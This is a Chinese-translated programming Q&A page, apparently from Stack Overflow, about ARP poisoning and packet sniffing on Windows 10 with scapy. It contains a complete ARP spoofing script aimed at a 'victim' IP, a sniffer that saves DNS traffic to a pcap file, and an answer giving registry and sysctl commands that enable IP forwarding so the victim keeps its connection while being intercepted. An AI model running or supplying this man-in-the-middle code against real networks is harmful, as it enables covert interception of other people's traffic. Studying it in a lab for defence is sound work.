[英]ARP spoofer and packet sniffer in windows 10 using scapy python 3
我已經嘗試了很多我在互聯網上看到的教程,但它們似乎都不適合我。 問題是我可以成功進行 ARP 中毒,但是當我運行 sniffer.py 腳本時,目標計算機將失去互聯網。
arp_spoofer.py
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets
for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the `target` that we are the `host`
spoof(target, host, verbose)
# telling the `host` that we are the `target`
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
# example run:
# python arp_spoof.py 192.168.1.2 192.168.1.1 --verbose
# python arp_spoof.py 192.168.1.2 192.168.1.1 --verbose
嗅探器.py
from pprint import pprint
from scapy.arch.windows import get_windows_if_list
from scapy.all import *
# disable verbose mode
conf.verb = 0
def parse_packet(packet):
"""sniff callback function.
"""
pkt = packet
wrpcap('filtered.pcap', pkt, append=True)
# if packet and packet.haslayer('UDP'):
# udp = packet.getlayer('UDP')
# udp.show()
def udp_sniffer():
"""start a sniffer.
"""
interfaces = get_windows_if_list()
pprint(interfaces)
print('\n[*] start udp sniffer')
sniff(
filter="udp port 53",
iface=r'Ethernet', prn=parse_packet
)
if __name__ == '__main__':
udp_sniffer()
在運行 sniffer.py 時,目標機器會失去互聯網。 請高度贊賞任何幫助。 謝謝你。
如果您的目標在您運行 arp 欺騙時失去連接,則意味着您尚未啟用 ip 轉發。
To enable it on linux: $ sysctl -w net.ipv4.ip_forward=1 To enable it on windows (run as administ): C:> reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /t REG_DWORD /v IPEnableRouter /d 1 /f
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.